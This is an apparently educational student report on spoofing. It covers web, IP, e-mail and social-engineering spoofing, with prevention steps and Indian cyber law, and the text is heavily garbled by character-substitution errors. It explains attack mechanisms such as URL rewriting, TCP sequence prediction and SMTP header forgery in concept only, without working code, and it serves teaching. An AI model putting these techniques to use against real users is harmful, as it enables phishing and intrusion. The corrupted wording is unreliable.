Você está na página 1de 21

Spoofing Introduction

1. INTRODUCTION
What Is Spoofing?
Spoofing means pretending to be something you are not. In Internet terms it means
pretending to be a different Internet address from the one you really have in order to gain
something. Web spoofing allows an attacker to create a "shadow copy" of the entire World
Wide Web.
Web Spoofing is a security attack that allows an adversary to observe and modify all web
pages sent to the victim's machine, and observe all information entered into forms by the
victim. Web Spoofing works on both of the maor browsers and is not prevented by
"secure" connections. !he attacker can observe and modify all web pages and form
submissions, even when the browser's "secure connection" indicator is lit. !he user sees no
indication that anything is wrong.
Spoofing Attacks
In a spoofing attack, the attacker creates misleading conte"t in order to trick the victim into
making an inappropriate security#relevant decision. $ spoofing attack is like a con game%
the attacker sets up a false but convincing world around the victim. !he victim does
something that would be appropriate if the false world were real. &nfortunately, activities
that seem reasonable in the false world may have disastrous effects in the real world.
Spoofing attacks are possible in the physical world as well as the electronic one.
Security-relevant Decisions
'y "security#relevant decision," we mean any decision a person makes that might lead to
undesirable results such as a breach of privacy or unauthori(ed tampering with data.
)eciding to divulge sensitive information, for e"ample by typing in a password or account
number, is one e"ample of a security#relevant decision. *hoosing to accept a downloaded
document is a security#relevant decision, since in many cases a downloaded document is
capable of containing malicious elements that harm the person receiving the document.
+I! ,aipur Page 1
Spoofing Introduction
Examples of spoofing:
man#in#the#middle
packet sniffs on link between the two end points, and can therefore pretend to be one end
of the connection
routing redirect
redirects routing information from the original host to the hacker's host -this is another
form of man#in#the#middle attack..
source routing
redirects individual packets by hackers host
blind spoofing
predicts responses from a host, allowing commands to be sent, but can't get immediate
feedback.
flooding
S/0 flood fills up receive 1ueue from random source addresses2 smurf3fraggle spoofs
victims address, causing everyone respond to the victim.
Types Of Spoofing
I4 Spoof
5#mail Spoof
Web Spoofing
0on !echnical Spoof
+I! ,aipur 2
Spoofing Introduction
. !e" Spoofing
Web Spoofing
Web spoofing is a kind of electronic con game in which the attacker creates a convincing
but false copy of the entire World Wide Web. !he false Web looks ust like the real one% it
has all the same pages and links. 6owever, the attacker controls the false Web, so that all
network traffic between the victim's browser and the Web goes through the attacker.
4retending to be a legitimate site
$ttacker creates convincing but false copy of the site
Stealing personal information such as login I), password, credit card, bank account,
and much more. aka 4hishing attack
7alse Web looks and feels like the real one
$ttacker controls the false web by surveillance
8odifying integrity of the data from the victims
+I! ,aipur 3
Spoofing Introduction
#$a%ple Of !e" Spoofing
+I! ,aipur 4
Spoofing Introduction
*onse1uences##
Surveillance& !he attacker can passively watch the traffic, recording which pages the
victim visits and the contents of those pages. When the victim fills out a form, the entered
data is transmitted to a Web server, so the attacker can record that too, along with the
response sent back by the server.
Ta%pering& !he attacker is also free to modify any of the data traveling in either direction
between the victim and the Web. !he attacker can modify form data submitted by the
victim. 7or e"ample, if the victim is ordering a product on#line, the attacker can change the
product number, the 1uantity, or the ship#to address.
Spoofing t'e !'ole !e"
/ou may think it is difficult for the attacker to spoof the entire World Wide Web, but it is
not. !he attacker need not store the entire contents of the Web. !he whole Web is available
on#line2 the attacker's server can ust fetch a page from the real Web when it needs to
provide a copy of the page on the false Web.
(o) t'e Attack !orks
!he key to this attack is for the attacker9s Web server to sit between the victim and the rest
of the Web. !his kind of arrangement is called a :man in the middle attack; in the security
literature.
&<= <ewriting
!he attacker9s first trick is to rewrite all of the &<=s on some Web page so that they point
to the attacker9s server rather than to some real server. 7or e"ample,
http%33home.netscape.com becomes http%33www.attacker.org3http%33home.netscape.com.
&<=s. !he victim9s browser re1uests the page from www.attacker.org, since the &<= starts
with http%33www.attacker.org. !he remainder of the &<= tells the attacker9s server where
on the Web to go to get the real document.
+I! ,aipur 5
Spoofing Introduction
7igure >% $n e"ample Web transaction during a Web spoofing attack.
T'e victi% re*uests a !e" page. T'e follo)ing steps occur&
!he victim9s browser re1uests the page from the attacker9s server
!he attacker9s server re1uests the page from the real server
!he real server provides the page to the attacker9s server
!he attacker9s server rewrites the page
!he attacker9s server provides the rewritten version to the victim.
+Secure, connections -on.t 'elp
?ne distressing property of this attack is that it works even when the victim re1uests a page
via a :secure; connection. If the victim does a :secure; Web access - a Web access using
the Secure Sockets =ayer. in a false Web, everything will appear normal% the page will be
delivered, and the secure connection indicator -usually an image of a lock or key. will be
turned on.
Starting t'e Attack
!o start an attack, the attacker must somehow lure the victim into the attacker9s false Web.
!here are several ways to do this. $n attacker could put a link to a false Web onto a
popular Web page. If the victim is using Web#enabled email, the attacker could email the
+I! ,aipur 6
Spoofing Introduction
victim a pointer to a false Web, or even the contents of a page in a false Web. 7inally, the
attacker could trick a Web search engine into inde"ing part of a false Web.
Co%pleting t'e Illusion
!he attack as described thus far is fairly effective, but it is not perfect. !here is still some
remaining conte"t that can give the victim clues that the attack is going on. 6owever, it is
possible for the attacker to eliminate virtually all of the remaining clues of the attack9s
e"istence.
Such evidence is not too hard to eliminate because browsers are very customi(able. !he
ability of a Web page to control browser behavior is often desirable, but when the page is
hostile it can be dangerous.
T'e Status /ine
!he status line is a single line of te"t at the bottom of the browser window that displays
various messages, typically about the status of pending Web transfers.
T'e /ocation /ine
!he browser9s location line displays the &<= of the page currently being shown. !he
victim can also type a &<= into the location line, sending the browser to that &<=. !he
attack as described so far causes a rewritten &<= to appear in the location line, giving the
victim a possible indication that an attack is in progress.
0ie)ing t'e Docu%ent Source
4opular browsers offer a menu item that allows the user to e"amine the 6!8= source for
the currently displayed page. $ user could possibly look for rewritten &<=s in the 6!8=
source, and could therefore spot the attack.
0ie)ing Docu%ent Infor%ation
$ related clue is available if the victim chooses the browser9s :view document information;
menu item. !his will display information including the document9s &<=. $s above, this
clue can be spoofed by replacing the browser9s menu bar. !his leaves no remaining visible
clues to give away the attack.
Tracing t'e Attacker
Some people have suggested that finding and punishing the attacker can deter this attack. It
is true that the attacker9s server must reveal its location in order to carry out the attack, and
+I! ,aipur 7
Spoofing Introduction
that evidence of that location will almost certainly be available after an attack is detected.
&nfortunately, this will not help much in practice because attackers will break into the
machine of some innocent person and launch the attack there. Stolen machines will be used
in these attacks for the same reason most bank robbers make their getaways in stolen cars.
<emedies
S'ort-ter% Solution In the short run, the best defense is to follow a three#part strategy%
>. disable ,avaScript in your browser so the attacker will be unable to hide the evidence of
the attack2
@. make sure your browser9s location line is always visible2
A. 4ay attention to the &<=s displayed on your browser9s location line, making sure they
always point to the server you think you9re connected to.
/ong-ter% Solution& We do not know of a fully satisfactory long#term solution to this
problem *hanging browsers so they always display the location line would help,
although users would still have to be vigilant and know how to recogni(e rewritten
&<=s. !his is the e"ample of a :trusted path; techni1ue, in the sense that the browser
is able to display information for the user without possible interference by untrusted
parties.
+I! ,aipur 8
Spoofing Introduction
1. I2 Spoofing
!'at is I2 Spoofing
$n I4 -Internet 4rotocol. address is the address that reveals the identity of your
Internet service provider and your personal Internet connection. !he address can
be viewed during Internet browsing and in all of your correspondences that you
send.
I4 spoofing hides your I4 address by creating I4 packets that contain bogus I4
addresses in an effort to impersonate other connections and hide your identity
when you send information. I4 spoofing is a common method that is used by
spammers and scammers to mislead others on the origin of the information they
send.
!he creation of I4 packets with a forged source. !he purpose of it is to conceal the
identity of the sender or impersonating another computing system.
Some upper layer protocols provide their own defense against I4 spoofing.
7or e"ample, !*4 uses se1uence numbers negotiate with the remote machine to
ensure that the arriving packets are part of an established connection. Since the
attacker normally cant see any reply packets, he has to guess the se1uence number
in order to hiack the connection.
(o) I2 Spoofing !orks
!he Internet 4rotocol or I4 is used for sending and receiving data over the Internet and
computers that are connected to a network. 5ach packet of information that is sent is
identified by the I4 address which reveals the source of the information.
When I4 spoofing is used the information that is revealed on the source of the data is not the
real source of the information. Instead the source contains a bogus I4 address that makes the
+I! ,aipur 9
Spoofing Introduction
information packet look like it was sent by the person with that I4 address. If you try to
respond to the information, it will be sent to a bogus I4 address unless the hacker decides to
redirect the information to a real I4 address.
!'y I2 Spoofing is Use-
I4 spoofing is used to commit criminal activity online and to breach network security.
6ackers use I4 spoofing so they do not get caught spamming and to perpetrate denial of
service attacks. !hese are attacks that involve massive amounts of information being sent to
computers over a network in an effort to crash the entire network. !he hacker does not get
caught because the origin of the messages cannot be determined due to the bogus I4
address.
I4 spoofing is also used by hackers to breach network security measures by using a bogus
I4 address that mirrors one of the addresses on the network. !his eliminates the need for the
hacker to provide a user name and password to log onto the network.
3rief (istory of I2 Spoofing
!he concept of I4 spoofing was initially discussed in academic circles in the >BCD's.
In the $pril >BCB article entitled% :Security 4roblems in the !*434rotocol Suite;, author S.
8 'ellovin of $! E ! 'ell labs was among the first to identify I4 spoofing as a real risk to
computer networks. 'ellovin describes how <obert 8orris, creator of the now infamous
Internet Worm, figured out how !*4 created se1uence numbers and forged a !*4 packet
se1uence. !his !*4 packet included the destination address of his :victim;
and using an I4 spoofing attack 8orris was able to obtain root access to his targeted system
without a &ser I) or password. $nother infamous attack, Fevin 8itnick's *hristmas )ay
crack of !sutomu Shimomura's machine, employed the I4 spoofing and !*4 se1uence
prediction techni1ues. While the popularity of such cracks has decreased due to the demise
of the services they e"ploited, spoofing can still be used and needs to be addressed by all
security administrators. $ common misconception is that "I4 spoofing" can be used to hide
your I4 address while surfing the Internet, chatting on#line, sending e#mail, and so forth.
!his is generally not true. 7orging the source I4 address causes the responses to be
+I! ,aipur 10
Spoofing Introduction
misdirected, meaning you cannot create a normal network connection. 6owever, I4
spoofing is an integral part of many network attacks that do not need to see responses -blind
spoofing..
#$a%ple of I2 spoofing--
+I! ,aipur 11
Spoofing Introduction
Applications of I2 spoofing
8any other attacks rely on I4 spoofing mechanism to launch an attack, for e"ample
S8&<7 attack -also known as I*84 flooding. is when an intruder sends a large number of
I*84 echo re1uests -pings. to the broadcast address of the reflector subnet. !he source
addresses of these packets are spoofed to be the address of the target victim. 7or each
packet sent by the attacker, hosts on the reflector subnet respond to the target victim,
thereby flooding the victim network and causing congestion that results in a denial of
service -)oS..
!herefore, it is essential best practice to implement anti spoofing mechanisms to prevent I4
spoofing wherever feasible.
$nti spoofing control measures should be implemented at every point in the network where
practical, but they are usually most effective at the borders among large address blocks or
among domains of network administration.
Spoofing Attacks
+I! ,aipur 12
Spoofing Introduction
!here are a few variations on the types of attacks that successfully employ I4 spoofing.
$lthough some are relatively dated, others are very pertinent to current security concerns.
Non-3lin- Spoofing
!his type of attack takes place when the attacker is on the same subnet as the victim. !he
se1uence and acknowledgement numbers can be sniffed, eliminating the potential difficulty
of calculating them accurately. !he biggest threat of spoofing in this instance would be
session hiacking. !his is accomplished by corrupting the data stream of an established
connection, then re#establishing it based on correct se1uence and acknowledgement
numbers with the attack machine. &sing this techni1ue, an attacker could effectively bypass
any authentication measures taken place to build the connection.
3lin- Spoofing
!his is a more sophisticated attack, because the se1uence and acknowledgement numbers
are unreachable. In order to circumvent this, several packets are sent to the target machine
in order to sample se1uence numbers. While not the case today, machines in the past used
basic techni1ues for generating se1uence numbers. It was relatively easy to discover the
e"act formula by studying packets and !*4 sessions. !oday, most ?Ss implement random
se1uence number generation, making it difficult to predict them accurately. If, however, the
se1uence number was compromised, data could be sent to the target. Several years ago,
many machines used host#based authentication services -i.e. <login.. $ properly crafted
attack could add the re1uisite data to a system -i.e. a new user account., blindly, enabling
full access for the attacker who was impersonating a trusted host.
4an in t'e 4i--le Attack
'oth types of spoofing are forms of a common security violation known as a man in the
middle -8I!8. attack. In these attacks, a malicious party intercepts a legitimate
communication between two friendly parties. !he malicious host then controls the flow of
communication and can eliminate or alter the information sent by one of the original
participants without the knowledge of either the original sender or the recipient. In this way,
an attacker can fool a victim into disclosing confidential information by :spoofing; the
identity of the original sender, who is presumably trusted by the recipient.
Denial of Service Attack
+I! ,aipur 13
Spoofing Introduction
I4 spoofing is almost always used in what is currently one of the most difficult attacks to
defend against G denial of service attacks, or )oS. Since crackers are concerned only with
consuming bandwidth and resources, they need not worry about properly completing
handshakes and transactions. <ather, they wish to flood the victim with as many packets as
possible in a short amount of time. In order to prolong the effectiveness of the attack, they
spoof source I4 addresses to make tracing and stopping the )oS as difficult as possible.
When multiple compromised hosts are participating in the attack, all sending spoofed
traffic2 it is very challenging to 1uickly block traffic.

+I! ,aipur 14
AD0ANTA5#S
4ultiple Servers &
Sometimes you want to change where packets heading into your network will go.
7re1uently this is because you have only one I4 address, but you want people to be able
to get into the bo"es behind the one with the Hreal' I4 address.
Transparent 2ro$ying &
Sometimes you want to pretend that each packet which passes through your =inu" bo" is
destined for a program on the =inu" bo" itself. !his is used to make transparent pro"ies%
a pro"y is a program which stands between your network and the outside world,
shuffling communication between the two. !he transparent part is because your network
won't even know it's talking to a pro"y, unless of course, the pro"y doesn't work.
DISAD0ANTA5#S
3lin- to Replies
$ drawback to ip source address spoofing is that reply packet will go back to the
spoofed ip address rather than to the attacker. !his is fine for many type of attack packet.
6owever in the scanning attack as we will see ne"t the attacker may need to see replies
.in such cases, the attacker can not use ip address spoofing.
Serial attack platfor%s &
6owever, the attacker can still maintain anonymity by taking over a chain of attack
hosts. !he attacker attacks the target victim using a point host#the last host in the attack
chain .5ven if authorities learn the point host9s identity .!hey might not be able to track
the attack through the chain of attack hosts all the way back to the attackers base host.
+I! ,aipur 15
2revention --
>. &se authentication based on key e"change between the machines on your
network2 something like I4sec will significantly cut down on the risk of spoofing.
@. &se an access control list to deny private I4 addresses on your downstream
interface.
A. Implement filtering of both inbound and outbound traffic.
I. *onfigure your routers and switches if they support such configuration, to reect
packets originating from outside your local network that claim to originate from
within.
J. 5nable encryption sessions on your router so that trusted hosts that are outside
your network can securely communicate with your local hosts.
+I! ,aipur 16
6. # 4ail Spoofing
)efination %
5#mail spoofing is the forgery of an e#mail header so that the message appears to
have originated from someone or somewhere other than the actual source.
#%ail spoofing is the creation of email messages with a forged sender address #
something which is simple to do because the core protocols do
no authentication. Spam and phishing emails typically use such spoofing to mislead
the recipient about the origin of the message.
$ number of measures to address spoofing are available including% S47, Sender
I), )FI8, and )8$<*. $lthough their use is increasing, it is likely that almost
half of all domains still do not have such measures in place.6owever, as of @D>A,
KDL of consumer mailbo"es worldwide use )8$<* to protect themselves against
direct domain spoofing
MIN
and only C.KL of emails have no form of domain
authentication.
Technical detail
When an S8!4 email is sent, the initial connection provides two pieces of address
information%
4AI/ 7RO4% # generally presented to the recipient as the Return-path: header but
not normally visible to the end user, and by default no checks are done that the
sending system is authori(ed to send on behalf of that address.
RC2T TO& # specifies which email address the email is delivered to, is not normally
visible to the end user but may be present in the headers as part of the "<eceived%"
header.
!ogether these are sometimes referred to as the "envelope" addressing, by analogy with a
traditional paper envelope.
?nce the receiving mail server signals that it accepted these two items, the sending system
sends the ")$!$" command, and typically sends several header items, including%
+I! ,aipur 17
7ro%& ,oe O )oe Poe1doeQe"ample.comR # the address visible to the recipient2
but again, by default no checks are done that the sending system is authori(ed to
send on behalf of that address.
Reply-to& ,ane <oe P,ane.<oeQe"ample.milR # similarly not checked
!he result is that the email recipient sees the email as having come from the address in
the From: header2 they may sometimes be able to find the MAIL FROM address2 and if they
reply to the email it will go to either the address presented in the MAIL FROM: or Reply-
to: header # but none of these addresses are typically reliable.
7urthermore the mail server may not check that these domains have been registered in the
)0S and are configured to receive emails. !his may generate backscatter if a reply is
generated.
Use "y spa% an- )or%s
8alware such as Fle( and Sober and many more modern e"amples often search for email
addresses within the computer they have infected, and use those addresses both as targets
for email, but also to create credible forged From fields in the emails that they send, so that
these emails are more likely to be opened. 7or e"ample%
$lice is sent an infected email which she opens, running the worm code.
!he worm code searches $lice's address book and finds the addresses of 'ob and *harlie.
7rom $lice's computer, the worm sends an infected email to 'ob, but forged to appear to
have been sent by *harlie.
In this case, even if 'ob's system detects the incoming mail as containing malware, he sees
the source as being *harlie # while $lice remains unaware of the actual infection.
7ooling %e-ia
It has happened that the media printed false stories based on spoofed e#mails.
In ?ctober @D>A, an e#mail which looked like it was from the Swedish company 7ingerprint
*ards was sent to a news agency, saying that Samsung offered to purchase the company.
!he news spread and the stock e"change rate surged by JDL. 'ut the e#mail was from
someone else.
It has also happened that people and companies have been scandali(ed by spoofed e#mail to
newspapers.
+I! ,aipur 18
#$a%ple of #%ail spoofing--
2revention ---
)on9t click links in emails instead always copy and paste, or even better manually
type the &<= in.
When entering personal or sensitive information, verify the &<= is as you e"pect,
and the site9s SS= certificate matches that &<=.
=ook at the I4 information of the email header. If an email originated from inside
your network, the sender should have very similar I4 address.
+I! ,aipur 19
8. Non Tec'nical Spoofing
!hese non#computer based techni1ues are commonly referred to as social
engineering. !his can be as simple as the attacker calling someone on the phone
saying that he is a certain person.
#$a%ple Of non tec'nical spoofing--
!'y -oes Non-Tec'nical Spoof !orks.--
!he main reason is that it e"ploits attributes of human behavior% trust is good and people
love to talk. 8ost people assume that if someone is nice and pleasant, he must be honest. If
an attacker can sound sincere and listen, you would be ama(ed at what people will tell him
+I! ,aipur 20
9. /a)s An- 2unis'%ent
*yber crimes can involve criminal activities that are traditional in nature, such as theft,
fraud, forgery, defamation and mischief, all of which are subect to the Indian 4enal *ode.
!he abuse of computers has also given birth to a gamut of new age crimes that are
addressed by the Information !echnology $ct, @DDD.
We can categori(e *yber crimes in two ways##
T'e Co%puter as a Target %#using a computer to attack other computers.
e.g. 6acking, Sirus3Worm attacks, )?S attack etc.
T'e co%puter as a )eapon %#using a computer to commit real world crimes.
e.g. *yber !errorism, I4< violations, *redit card frauds, 57! frauds, 4ornography etc.
*yber *rime regulated by *yber =aws or Internet =aws.
/a) An- 2unis'%ent 7or Spoofing--
&nder Information !echnology -$mendment. $ct, @DDC, Section KK#) and Section I>T,
I>B E IKJ of Indian 4enal *ode, >CKD also applicable. Spoofing offence is cogni(able,
bailable, compoundable with permission of the court before which the prosecution of such
offence is pending and triable by any magistrate.
+I! ,aipur 21

Você também pode gostar